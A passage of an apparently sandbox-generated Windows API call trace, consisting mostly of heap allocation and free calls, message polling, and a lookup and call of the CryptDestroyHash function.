out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0036.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0036.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7d8 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd78 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.656] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0036.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0036.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0036.658] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.658] CryptDestroyHash (hHash=0x7c2240) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.660] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: 